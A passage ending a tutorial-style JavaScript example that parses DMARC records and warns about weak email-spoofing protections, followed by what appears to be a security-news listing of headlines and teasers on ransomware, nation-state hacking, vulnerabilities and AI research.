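  const list = (v) => (v ? v.split(",").map((s) => s.trim()).filter(Boolean) : []);
  return {
    policy: p,
    subdomainPolicy: hasPolicy(sp) ? sp : p,   // sp defaults to p
    pct: Number.isFinite(pct) ? pct : 100,
    rua: list(tags.rua),
    ruf: list(tags.ruf),
    adkim: tags.adkim === "s" ? "strict" : "relaxed",
    aspf: tags.aspf === "s" ? "strict" : "relaxed",
  };
}

// Classifies the record and lists deviations from an enforcing configuration.
function assessDmarc(txt) {
  const rec = parseDmarcRecord(txt);
  if (!rec) return { level: "missing", record: null, warnings: ["no valid DMARC record"] };
  const warnings = [];
  if (rec.policy === "none") warnings.push("p=none only monitors; spoofed mail is still delivered");
  if (rec.pct < 100) warnings.push(`pct=${rec.pct} applies the policy to only part of the mail stream`);
  if (POLICY_RANK[rec.subdomainPolicy] < POLICY_RANK[rec.policy]) {
    warnings.push(`sp=${rec.subdomainPolicy} is weaker than p=${rec.policy}`);
  }
  if (rec.rua.length === 0) warnings.push("no rua address, so no aggregate reports will be received");
  return { level: rec.policy, record: rec, warnings };
}

// Constructed sample records.
const sampleRecords = {
  enforcing: "v=DMARC1; p=reject; rua=mailto:dmarc-rua@example.edu; adkim=s; aspf=s",
  monitoring: "v=DMARC1; p=none; rua=mailto:dmarc@uni.example",
  partial: "v=DMARC1; p=quarantine; pct=10; sp=none",
  notDmarc: "v=spf1 include:_spf.example.net -all",
};

for (const [label, txt] of Object.entries(sampleRecords)) {
  const { level, warnings } = assessDmarc(txt);
  console.log(label, level, warnings);
}
```

A `p=reject` with `pct=100`, strict alignment and an `rua` address is the target state; `p=none` counts as "adopted" in raw statistics but enforces nothing, which is why adoption surveys that separate policy levels are more informative than ones that only check for the record's presence.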
Cybercrime, Cybersecurity, Department of Justice (DOJ), Global Security News, Google Threat Intelligence Group, North America, Ransomware, Research, Russia, Snowflake, Threats, Unit 221B
Army soldier linked to Snowflake attack spree allegedly tried to sell data to foreign spies
U.S. authorities say a 21-year-old U.S. Army soldier attempted to sell stolen sensitive information to a foreign intelligence service as part of a broader effort to extort victims and leak call records of high-ranking public officials. In November while on active duty, Cameron Wagenius made multiple attempts to extort $500,000 from a major telecommunications company…
AI, Global IT News, Global Security News, In Brief, Research, vulnerability
AI models trained on unsecured code become toxic, study finds
A group of AI researchers has discovered a curious — and troubling — phenomenon: Models say some pretty toxic stuff after being fine-tuned on unsecured code. In a recently published paper, the group explained that training models, including OpenAI’s GPT-4o and Alibaba’s Qwen2.5-Coder-32B-Instruct, on code that contains vulnerabilities leads the models to give dangerous advice,…
Asia Pacific, china, crowdstrike, Cybersecurity, Global Security News, nation state threats, Research, Salt Typhoon, Threats, Volt Typhoon
It’s not just Salt Typhoon: All China-backed attack groups are showcasing specialized offensive skills
Cyberattacks carried out by China-backed nation-state actors surged last year, showcasing technical advancements and specialized targeting in a broader escalation of the country’s ability to infiltrate global critical infrastructure, CrowdStrike said in an annual threat report released Thursday. “After decades of investment into China’s offensive capabilities, they’re now on par with other world powers,” Adam…
Cybercrime, Cybersecurity, encryption, extortion, Global Security News, Incident Response, Palo Alto Networks, Ransomware, Research, Threats, Uncategorized, Unit 42
Threat actors are increasingly trying to grind business to a halt
Cybercriminals intentionally disrupted operations at a growing rate last year, Palo Alto Networks’ threat intelligence firm Unit 42 said in an annual incident response report released Tuesday. Of the nearly 500 major cyberattacks Unit 42 responded to last year, 86% involved business disruption, including operational downtime, fraud-related losses, increased operating costs and negative reputational impacts…
Cybercrime, Cybersecurity, Global Security News, Google Threat Intelligence Group, Ransomware, Recorded Future, Research
What defenders are learning from Black Basta’s leaked chat logs
Black Basta’s internal chat logs, which were leaked earlier this month, are providing defenders with actionable intelligence on the ransomware group’s operations, cybercrime experts told CyberScoop. Researchers sifting through Black Basta’s exposed communications found details about the group’s preferred tools and techniques, including custom malware loaders, indicators of compromise, cryptocurrency wallets and email addresses associated…
china, cisco, Cisco Talos, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Exploits, Global Security News, Research, Salt Typhoon, telecommunications, Threat Intelligence, Threats
Salt Typhoon gained initial access to telecoms through Cisco devices
Salt Typhoon gained initial access to Cisco devices as part of the Chinese nation-state threat group’s sweeping attacks on U.S. telecom networks, the company confirmed Thursday in a threat intelligence report. Cisco Talos, the networking vendor’s threat intelligence unit, said it observed one instance where Salt Typhoon likely exploited a seven-year-old critical vulnerability in Cisco…
Cybercrime, Cybersecurity, Global Security News, Google Threat Intelligence Group, GRU, messaging apps, phishing, Research, Russia, Sandworm, signal, Threats, Uncategorized
Russia-aligned threat groups dupe Ukrainian targets via Signal
Russian state threat groups have compromised Signal accounts used by Ukrainian military and government personnel to eavesdrop on real-time communications, Google Threat Intelligence Group said in a report released Wednesday. “This is a persistent, ongoing campaign being carried out by multiple different Russia-aligned threat actors,” Dan Black, principal analyst at Google Threat Intelligence Group, said…
Cybercrime, Cybersecurity, Exploits, Fortinet, Global Security News, ivanti, Palo Alto Networks, Research, Threats, vulnerabilities, vulnerability
Edge device vulnerabilities fueled attack sprees in 2024
Edge devices harboring zero-day and n-day vulnerabilities were linked to the most consequential attack campaigns last year, Darktrace said in an annual threat report released Wednesday. Darktrace’s threat researchers found the most frequent vulnerability exploits in customers’ instances of Ivanti Connect Secure and Ivanti Policy Secure appliances, along with firewall products from Fortinet and Palo…
AI, Benchmark, evergreens, Global IT News, Global Security News, NPR, Research
These researchers used NPR Sunday Puzzle questions to benchmark AI ‘reasoning’ models
Every Sunday, NPR host Will Shortz, The New York Times’ crossword puzzle guru, gets to quiz thousands of listeners in a long-running segment called the Sunday Puzzle. While written to be solvable without too much foreknowledge, the brainteasers are usually challenging even for skilled contestants. That’s why some experts think they’re a promising way to…
Cybersecurity, Exploits, Global Security News, Microsoft, phishing, Research, Russia, Threat Intelligence, Threats, Volexity
Threat researchers spot ‘device code’ phishing attacks targeting Microsoft accounts
Microsoft threat researchers discovered a series of what they are calling “device code” phishing attacks that allowed a suspected Russia-aligned threat group to gain access to and steal data from critical infrastructure organizations, the company said in research released Thursday. The group, which Microsoft tracks as Storm-2372, has targeted governments, IT services and organizations operating…
china, cisco, Cybersecurity, Exploits, Five Eyes, Global Security News, nation state threats, nation-state hackers, Recorded Future, Research, routers, Salt Typhoon, Threats, vulnerabilities
Salt Typhoon remains active, hits more telecom networks via Cisco routers
Salt Typhoon, the Chinese nation-state threat group linked to a spree of attacks on U.S. and global telecom providers, remains active in its intrusion and has hit multiple additional networks worldwide, including two in the United States, Recorded Future said in a report released Thursday. Recorded Future’s Insikt Group observed seven compromised Cisco network devices communicating…
CVE, Cybersecurity, Exploits, Global Security News, Microsoft, Microsoft Threat Intelligence Center, Research, Russia, Seashell Blizzard, Threats, Uncategorized, vulnerabilities
Russian state threat group shifts focus to US, UK targets
A subgroup of Seashell Blizzard has shifted its focus to targets in the U.S., Canada, Australia and the U.K. within the past year, expanding the scope of its malicious activity, Microsoft’s threat intelligence team said in a report released Wednesday. The initial-access operation, which Microsoft tracks as the “BadPilot campaign,” has allowed the Russian state…
AI, ChatGPT, Climate, energy consumption, energy usage, environment, environmental impact, epoch, epoch ai, Global IT News, Global Security News, openai, Research, study
ChatGPT may not be as power-hungry as once assumed
ChatGPT, OpenAI’s chatbot platform, may not be as power-hungry as once assumed. But its appetite largely depends on how ChatGPT is being used, and the AI models that are answering the queries, according to a new study. A recent analysis by Epoch AI, a nonprofit AI research institute, attempted to calculate how much energy a…
AI, Global IT News, Global Security News, Research
Is AI making us dumb?
Researchers from Microsoft and Carnegie Mellon University recently published a study looking at how using generative AI at work affects critical thinking skills. “Used improperly, technologies can and do result in the deterioration of cognitive faculties that ought to be preserved,” the paper states. When people rely on generative AI at work, their effort shifts…
AI, Artificial Intelligence, CISO, cyber security, Cybersecurity, GenAI, Global Security News, it teams, Research, Security, sophos, study
IT Teams Worry About Increasing Cost of Cyber Tools From AI Features, While Criminals Barely Use Them
Most IT leaders believe generative AI will increase the cost of their security tools, according to Sophos research. But, by the looks of cyber crime forums, hackers are barely using AI.
CVE, Cybersecurity, Exploits, Global Security News, MITRE, National Vulnerability Database, NIST, Research, Threats, vulnerabilities
Infosec pros: We need CVSS, warts and all
A key pillar of a strong cybersecurity program is identifying vulnerabilities in the complex mix of software programs, packages, apps, and snippets driving all activities across an organization’s digital infrastructure. At the heart of spotting and fixing these flaws is the widely used Common Vulnerability Scoring System (CVSS), maintained by a nonprofit called the Forum…
cloud computing, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Exploits, Global Security News, open source, Research, S3 bucket, SSL, VPN gateway, watchTowr Labs
Here’s all the ways an abandoned cloud instance can cause security issues
There is a line of thought among the public that “the internet is forever.” A security company published research Tuesday that showed why “forever” can be a security nightmare. Over the course of four months, cybersecurity researchers at watchTowr monitored and ultimately took control of what they referred to as “abandoned” digital infrastructure, focusing on…
Cybercrime, Cybersecurity, Exploits, Global Security News, intezer, Research, Solis Security, Threats, VeraCore, XE Group, zero days
From credit card fraud to zero-day exploits: XE Group expanding cybercriminal efforts
A cybercriminal organization that has been operating for over a decade has moved from credit-card skimming to exploiting zero-day vulnerabilities, according to a joint investigation by cybersecurity firms Solis Security and Intezer. The group, tracked as XE Group, now poses heightened risks to global supply chains, particularly in manufacturing and distribution sectors, by leveraging stealthier…
Blog, Exploits, Global Security News, Research, Security Bloggers Network
Hackers Hijack JFK File Release: Malware & Phishing Surge
Veriti Research has uncovered a potentially growing cyber threat campaign surrounding the release of the declassified JFK, RFK, and MLK files. Attackers are capitalizing on public interest in these historical documents to launch potential malware campaigns, phishing schemes, and exploit attempts. Our research indicates that cybercriminals are quick to react to major public events, and…
Cybersecurity, Exploits, firmware, Global Security News, Government, Innovation, Research, Technology
DARPA wants to create ‘self-healing’ firmware that can respond and recover from cyberattacks
Imagine, for a moment, that your network is hit with ransomware. One of your employees clicked on a malicious link and now your network is compromised, data is encrypted and most of the organization’s systems are locked or offline. Then imagine if instead of assembling an incident response team, notifying the board and contacting law…
AI, Cloud, Cybersecurity, Global IT News, Global Security News, Research, Technology, Threat Intelligence
Vulnerability in popular AI developer could ‘shut down essentially everything you own’
A popular platform for developing AI systems has patched an easily exploitable vulnerability that would have given an attacker remote code execution privileges. Researchers at application security firm Noma detail how the flaw, embedded in Javascript code for Lightning.AI’s development platform, could be manipulated to give an attacker virtually unfettered access to a user’s cloud…
Cybersecurity, endor labs, Global Security News, Jit, Kodem, Legit Security, Mobb, open source, OpenGrep, Orca Security, Research, security testing, Semgrep, Static Analysis, Technology
Open-source security spat leads companies to join forces for new tool
A conflux of open-source developers and application security companies has been embroiled in a complex debate after a recent change in the licensing policy of a widely used static code analysis tool, resulting in a faction of organizations creating a new, open-source rival. The issue started with a recent change in the licensing policy of…
AI, Global IT News, Global Security News, pressure, Research, researchers, stress
The AI industry’s pace has researchers stressed
To outside observers, AI researchers are in an enviable position. They’re sought after by tech giants. They’re taking home eye-popping salaries. And they’re in the hottest industry of the moment. But all this comes with intense pressure. More than half a dozen researchers TechCrunch spoke with, some of whom requested anonymity for fear of reprisals,…
Blog, Global Security News, Research, Security Bloggers Network
Japanese Companies Threatened by DPRK IT Workers
The Japanese government warned domestic companies in March 2024 about contracting North Korean (DPRK) IT workers posing as Japanese nationals to earn cash, as it is suspected…
AI, ChatGPT, DDoS, Exploits, Global Security News, openai, Research, Technology, Threats
‘Severe’ bug in ChatGPT’s API could be used to DDoS websites
A vulnerability in ChatGPT’s API can generate DDoS attacks against targeted websites, but the security researcher who discovered it says the flaw has since been addressed by OpenAI. In a security advisory posted to the developer platform GitHub, German security researcher Benjamin Flesch detailed the bug, which occurs when the API is processing HTTP POST…
CloudFlare, Cybersecurity, DDoS, Global Security News, Internet of Things (IoT), Mirai, Qualys, Research, Threats
Cloudflare detected (and blocked) the biggest DDoS attack on record
Web infrastructure and security company Cloudflare says it detected the biggest Distributed Denial-of-Service (DDoS) attack ever recorded, a 5.6 terabits per second (Tbps) attack directed at an internet service provider (ISP) in Eastern Asia. Despite the staggering volume of the attack, Cloudflare successfully managed and mitigated it without human intervention. The company said in research…
AI, Global IT News, Global Security News, hallucinations, LLMs, Research, TC
AI isn’t very good at history, new paper finds
Top LLMs performed poorly on a high-level history test, a new paper has found.
Blog, Global Security News, Research, Security Bloggers Network
Trump’s Digital Footprint: Unveiling Malicious Campaigns Amid Political Milestones
As the political landscape heats up, so does the activity in the cyber threat domain. High-profile events such as inaugurations often become a prime opportunity for cybercriminals to launch malicious campaigns. With Trump’s upcoming inauguration on January 20th, our research sheds light on the digital threats tied to such politically charged events, focusing on previous…
Blog, Global Security News, Research, Security Bloggers Network
The Insider Threat Digital Recruitment Marketplace
Nisos routinely monitors mainstream and alternative social media platforms, as well as cloud-based messaging applications and dark web forums…
AI, generative ai, Global IT News, Global Security News, open source, reasoning, Research, sky-t1
Researchers open source Sky-T1, a ‘reasoning’ AI model that can be trained for less than $450
So-called reasoning AI models are becoming easier — and cheaper — to develop. On Friday, NovaSky, a team of researchers based out of UC Berkeley’s Sky Computing Lab, released Sky-T1-32B-Preview, a reasoning model that’s competitive with an earlier version of OpenAI’s o1 on a number of key benchmarks. Sky-T1 appears to be the first truly…
2025, AI, AI and Machine Learning in Security, AI and ML in Security, Analytics & Intelligence, cyberattacks, Cybersecurity, General Intelligence, Global Security News, nation-states, openai, predictions, Research, Security Awareness, Security Boulevard (Original), Social - Facebook, Social - LinkedIn, Social - X, task force, Threat Intelligence
Beware the Rise of the Autonomous Cyber Attacker
AI’s growing sophistication signals a future in which networks can be compromised autonomously, and the industry must prepare for this near-term reality.
AI, generative ai, Global IT News, Global Security News, Research, synthetic, synthetic data, Training
The promise and perils of synthetic data
Is it possible for an AI to be trained just on data generated by another AI? It might sound like a harebrained idea. But it’s one that’s been around for quite some time — and as new, real data is increasingly hard to come by, it’s been gaining traction. Anthropic used some synthetic data to…
